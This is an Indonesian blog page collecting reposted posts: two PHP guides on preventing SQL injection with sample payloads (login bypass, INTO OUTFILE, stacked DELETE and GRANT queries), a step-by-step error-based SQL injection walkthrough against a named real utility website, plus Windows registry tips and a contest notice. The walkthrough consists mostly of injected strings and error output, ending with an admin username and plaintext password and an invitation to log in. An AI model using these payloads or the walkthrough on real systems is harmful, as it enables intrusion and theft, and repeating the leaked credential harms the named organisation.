3
Algoritma dan teknik menangkal SQL injection

.
Tidak dipungkiri lagi, SQL injection adalah salah satu teknik hacking yg sangat berbahaya. Jika diamati, SQL injection berawal dari satu hal yg sebenarnya sangat sederhana sekali. Kali ini kita akan membahas teknik dan algoritma menangkal SQL injection yg dilakukan melalui methode $_GET.

Tulisan ini diawali kepada kesadaran bahwa atas banyaknya kasus SQL injection. Disamping sedikitnya kesadaran dari programmer dan kebingungan programmer untuk membenahi skripnya. Dikarenakan sedikitnya resource yg membahas bagaimana mencegah SQL injection. Sementara tips dan trik untuk melakukannya sangat banyak.

Mari kita lihat bersama: http://target.com/berita.php?task=detail&id=9

Pada kebanyakan aplikasi yg dibuat oleh programmer pemula, kode program pada berita.php adalah sebagai berikut


require_once(”connection.php”);

$sql = “SELECT * FROM berita WHERE id=”.$_GET['id'];

$result = mysql_query($sql);

while($data = mysql_fetch_array()){

echo “

”.$data['judul'].”

”;

echo “Posting pada tanggal: “.$data['tanggal_posting'];

echo $data['isi'];

}

?>

Coba kita lihat lagi, betapa programmer, entah karena ketidak tahuan atau malas membenahi(nah ini yg susah) tidak memberikan filter pada input $_GET['id']. Padahal ini sangat berbahaya jika attacker mencoba melakukan teknik ini.

Disana ada 2 kesalahan fatal.

1. Tidak memberikan filter atas variable $_GET['id']. Sehingga MySQL Server akan memberikan signal kesalahan ke browser(Jika pada PHP error_message=ON).

2. Tidak melakukan checking terhadap hasil dari Query.

Lantas, bagaimana cara penanggulangannya. Cara mudahnya kita modifikasi skrip diatas seperti berikut ini:


require_once(”connection.php”);

// –> validasi $_GET['id']

if(!ctype_digit($_GET['id'])){

die(””);

}

$sql = “SELECT * FROM berita WHERE id=”.$_GET['id'];

$result = mysql_query($sql);

// –> validasi hasil query

if(mysql_num_rows($result)<0){

while($data = mysql_fetch_array()){

echo “

”.$data['judul'].”

”;

echo “Posting pada tanggal: “.$data['tanggal_posting'];

echo $data['isi'];

}

} else { echo “Berita tidak ditemukan.”; }

?>

Nah, skrip diatas kira-kira mempunyai arti algoritma seperti ini:

1. Pertama-tama, validasi $_GET['id'], jika ia bernilai Integer(angka), maka lanjutkan. Jika tidak, tampilkan peringatan “Jangan coba-coba ya.” dan kembali kehalaman selanjutnya.

2. Lakukan Query

3. Cek hasil query. Jika hasil lebih besar dari 0(1,2,dst), ambil hasil query dan tampilkan ke layar browser. Jika tidak tampilkan pesan “Berita tidak ditemukan.”.

Catatan: algoritma ini bisa dipakai tidak hanya pada PHP saja, tetapi bisa untuk bahasa pemrograman web yg lain. Tentu saja dengan syntax masing-masing. Untuk database selain MySQL tinggal mencari fungsi yg sama atau setara dengan fungsi-fungsi MySQL.

Source: srandal.com


Bookmark and Share


1
Cara mencegah SQL Injection

.
SQL Injection adalah salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server. Pada dasarnya,serangan ini difasilitasi oleh kode program anda sendiri. teknik nya,penyerang mencoba memasukkan query (melalui field atau URL) yang akan menyebabkan database server men-generate query SQL yang tidak valid.

Pada kenyataan nya,SQL injection terbukti merupakan salah satu teknik terbaik yang sering melumpuhkan sasarannya. Begitu penyerang berhasil menguasai kendali dataase server,ia bisa melakukan apa saja,seperti memodifikasi atau bahkan menghapus semua data yang ada. bagaimana pun juga, ini bisa dicegah jika kode program anda melakukan validasi yang baik.

Sebenarnya apa bila anda teliti,teknik SQL injection sangat sederhana sekali. Akan tetapi justru yang sering diabaikan oleh para programer,entah itu tidak tahu atau lupa.

Berikut ini beberapa contoh teknik SQL injection,implementasi,dan cara menggagalkan nya.

Single SQL Injection
walaupun penyerang awalnya mencoba memasukan query berupa pernyataan SQL,akan tetapi bukan sembarang query. Dalam hal ini,penyerang cukup memiliki pengatahuan mengenai SQL,sebagai contoh permulaan (maklumlah saya masih newbie :P) anda memiliki kode seperti ini.

$match = false;
if (isset($_POST['submit'])) {
$nama = $_POST['nama'];
$pass = $_POST['pass'];
$sql = "SELECT nama, password FROM user WHERE
nama='$nama' AND password='$pass'";
$res = mysqli_query($db, $sql);
// jika res berhasil,dan row yang
// dikembalikan=1, set $match=true
if ($res && mysqli_query_rows($res) == 1) {
$match = true ;
mysqli_free_result($res);
}
if ($match === true) {
echo 'account match';
} else {
echo 'invalid account';
}
}


kode program diatas memang kelihatan melakukan verifikasi data, tetapi sebenarnya sangat rapuh,penyerang bisa menggnakan query-query seperti dibawah ini,untuk melakukan akses secara tidak sah

// mengisi field nama saja,# adalah komentar,
// yang akan mengabaikan baris setelahnya
admin'#

// mengisi nama field saja
// mengekstrak data kelokasi tertentu
'OR' 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt '#
'OR' 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt '#

Bagaimapun juga,contoh contoh SQL injection diatas adalah contoh yang umum. Adapun untuk mencegah nya menggunakan fungsi mysql_real_escape_string () atau addslashes(), seperti yang diuraikan pada fungsi myMacig()sebelumnya

$nama = myMacig($_POST['nama']};
$pass = myMacig($_POST['pass']};


Multiple SQL injection
Contoh SQL injection lainnya adalah dengan memberikan multiple query,seperti berikut:
// $id dari method GET/POST
$sql = "SELECT * FROM buku WHERE kode='{$id}’ “;
//mengahapus isi table
0; DELETE FROM user
// membuat account baru
0; GRANT ALL ON *.* TO 'xxx@%'
Dalam kasus ini,macig quote akan mengabaikan tanda titik koma,ini sangat membahayakan
jika menggunakan SQLite atau postgreSQL. Adapun solusi nya adalah menggunakan operator casting untuk memastikan bahwa id harus integer.

//Simulasi nilai $_POST['id']
0; DELETE FROM user
$id = (int) myMacig($_POST['id']);

apabila anda ingin memeriksa apakah input mengandung karakter tertentu,gunakan fungsi strpos().

$nama = myMacig ($_POST ['id']);
// periksa apakah karakter ; terdapat
// di variabel $nama.
if (strpos($nama, ';' die ('Naughty Naughty,
Very Naughty...');


Bookmark and Share


1
SQL Injection

.
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.


******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )


Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)


Bookmark and Share


4
Mengembalikan “Folder Option” yang hilang

.
Virus-virus zaman sekarang memang makin ganas, selain itu makin bervariasi dan tingkat penyebarannya pun semakin mudah aja. Satu kali anda salah klik, maka komputer Anda pun terinfeksi. Salah satu yang sering dilakukan sang virus adalah menghilangkan “Folder Option” di menu Tools pada Explorer anda, sehingga salah satu akibatnya anda tidak bisa merubah option untuk view/ show hidden file, hingga akhirnya anda tidak bisa mengakses folder yang anda hidden

Nah bila anda mengalami seperti ini, “Folder Option” anda hilang cobalah satu dari dua langkah berikut ini :

Langkah Satu :

Klik menu Start > Run

Ketik : “gpedit.msc” tanpa tanda kutip untuk membuka Group Policy Windows

Setelah itu masuk ke :User Configuration >Administrative Templates >Windows Component > Windows Explorer.

Di Panel sebelah kanan, carilah “Remove the Folder Option menu item from the Tools Menu” kemudian double klik dan set value ke “Disabled”



Langkah Dua :

Bukan Registry Editor dengan mengetikan “Regedit” pada menu Run

Kemudian carilah key berikut : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

dan pada panel sebelah kanan cari : NoFolderOptions dan set value menjadi 0

jika anda tidak menemukan NoFolderOptions, tinggal anda buat sendiri dan masukkan valuenya dengan 0.


Bookmark and Share


12
Regedit Disable by Administrator

.
Saat kita akan mengedit registri, ada kalanya fungsi regedit di Windows tidak bisa diakses alias disable. Ini bisa dikarenakan oleh virus, atau juga memang oleh sang Administrator telah di-disable untuk mencegah orang yang tidak berkepentingan mengutak-atik setting Windows. Kalau anda pernah mengalami kejadian seperti ini Registry Editing has been disable by your Administrator ketika memasukkan perintah REGEDIT pada menu RUN
solusi mengatasi registri disable by administrator


Inilah solusi singkat yang mungkin bisa membantu anda mengatasi masalah seperti diatas.

Klik Menu [Start] – [RUN] dan masukkan perintah : GPEdit.msc
GPEDIT



Akan muncul Windows Group Policy, selanjutnya arahkan ke [User Configuration] – [Administrative Templates] – [System].
Group Policy




Setelah itu pada jendela sebelah kanan (panel setting) Double Klik Prevent Access to Registry Editing Tools
disable registry tools



Pada jendela yang muncul pilih NOT CONFIGURED atau DISABLED, untuk mengaktifkan kembali fungsi regedit.
Disable Regedit

Klik OK

Sekarang coba anda akses registry editor lewat menu [RUN] - REGEDIT kalau masih belum berhasil, Restart Komputer anda dan coba akses lagi registry editor.

Bila ternyata Solusi tersebut masih juga kurang ampuh, Tinggal Download REGTOOLS dari Doug Knox, Save dan kemudian jalankan regtools, ini berfungsi untuk meng-enable dan disable registry. Bila kondisi registry editor disable, maka regtool akan meng-enable-kannya, begitupun sebaliknya.

Selamat mencoba dan jangan lupa untuk mendapatkan update dan informasi terbaru dari tasikisme.com secara langsung ke email, tinggal masukkan email anda di bawah ini dan klik subscribe!


Bookmark and Share


3
Lomba Blog dan Posting Forum Muslimhackers.net

.
Lomba Blog Muslimhackes.net

Tema Lomba Blog:
“Hacker Bukan Cracker”

Latar Belakang:
Menurut Wikipedia, hacker adalah seseorang yang mendalami komputer secara mendetail. Tetapi seiring berjalannya waktu, istilah “hacker” sering disamakan cracker. Hal itu membuat pandangan masyarakat terhadap hacker menjadi negatif.

Tujuan:
1. Memberikan pengertian sebenarnya tentang hacker kepada masyarakat.
2. Memperkenalkan situs http://muslimhackers.net .

Ketentuan Peserta:
1. Lomba terbuka untuk seluruh Warga Negara Indonesia.
2. Blog yang didaftarkan adalah blog milik sendiri / bukan milik orang lain
3. Memasang banner Lomba Blog Muslim Hackers pada sidebar blog.
4. Mendaftarkan blog sebelum waktu pendaftaran selesai.
5. Blog berbahasa Indonesia atau English.
6. Terdapat minimal 1 artikel lain (bukan merupakan artikel yang dilombakan) yang berkaitan dengan Islam dan atau IT pada blog.

Peraturan:
1. Membuat tulisan yang berhubungan dengan tema dengan disertai review singkat tentang situs Muslim Hackers..
2. Tulisan merupakan karya sendiri bukan hasil karya orang lain.
3. Tulisan ditampilkan di dalam blog masing-masing peserta.
4. Memasang link ke situs Muslim Hackers (http://www.muslimhackers.net) pada postingan blog.
5. Mendaftarkan blog ke http://blog.muslimhackers.net/lomba sebelum pendaftaran ditutup.
8. Tiap peserta boleh mengirimkan lebih dari satu tulisan.
9. Batas waktu untuk melakukan publikasi tulisan adalah 5 September 2010.

Banner Lomba:
Banner berikut harus dipasang di sidebar blog masing-masing peserta lomba.

Masukkan script di bawah ini ke dalam sidebar blog anda.

Link Yang di pasang





Copy kode di bawah masukan di blog anda,





Penilaian:
1. Penilaian dilakukan oleh juri dari Muslim Hackers.
2. Kriteria penilaian:
a. Popularitas blog.
b. Kualitas tulisan yang dilombakan.
c. Keaslian tulisan.
d. Posisi blog di Search Engine Google dengan kata kunci “Hacker Bukan Cracker”.
e. Tulisan lain yang ada di dalam blog.
3. Daftar pemenang akan diumumkan di http://blog.muslimhackers.net pada 10 September 2010.
4. Keputusan juri tidak dapat diganggu gugat.

Hadiah Lomba Blog:
Juara I: USB Flashdisk 8GB + Kaos Muslim Hackers
Juara II: USB Flashdisk 8GB

———————————————————

Lomba Posting Forum Muslimhackers.net

Ketentuan Peserta Lomba Posting Forum:
1. Lomba terbuka untuk seluruh Warga Negara Indonesia.
2. Peserta terdaftar sebagai member Forum Muslim Hackers.
3. Bagi calon peserta yang belum menjadi member bisa mendaftarkan diri di http://forums.muslimhackers.net
4. Setiap member forum Muslim Hackers otomatis menjadi peserta kecuali pengurus forum.

Peraturan Lomba Posting Forum:
1. Peserta membuat thread/topik pada forum dan memposting tulisan yang berisi share pengetahuan/informasi tentang Islam dan IT sesuai dengan subforum yang ada pada http://forums.muslimhackers.net.
2. Isi postingan bisa berupa tulisan saduran dari orang lain dengan tetap mencantumkan sumber asli tulisan.
3. Tidak diperbolehkan memposting tulisan yang memuat hal-hal ilegal (misal: link download aplikasi bajakan/warez, bagi-bagi kartu kredit, akun premium, trik mengakali sebuah sistem untuk mendapatkan keuntungan secara ilegal, dan sebagainya).
4. Khusus untuk subforum perkenalan hanya diperbolehkan membuat satu thread/topik.
5. Reply/balasan yang berupa junk/sampah (misal: “terima kasih infonya”, “ijin download”, “bagus” dan sebagainya) tidak dimasukkan dalam penjurian.
6. Thread/Topik yang isinya berupa pertanyaan tidak dimasukkan dalam penjurian.
7. Peserta yang melakukan posting junk/menyampah akan dikurangi nilainya.

Penilaian Lomba Posting Forum:
1. Penilaian dilakukan oleh juri dari Muslim Hackers.
2. Kriteria penilaian:
a. Banyaknya thread/topik.
b. Kualitas postingan.
c. Banyaknya balasan/reply yang berkualitas dari member lain pada thread/topik yang dibuat.
3. Daftar pemenang akan diumumkan di http://blog.muslimhackers.net pada 10 September 2010.
4. Keputusan juri tidak dapat diganggu gugat.

Hadiah Lomba Posting Forum:
Juara I: USB Flashdisk 8GB


Bookmark and Share


1
Delete An "undeletable" File

.
Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.

Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in. At the command prompt type DEL where is the file you wish to delete. Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell. Close Task Manager.

Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal


Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Source: 1001 Hacking

Bookmark and Share



 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com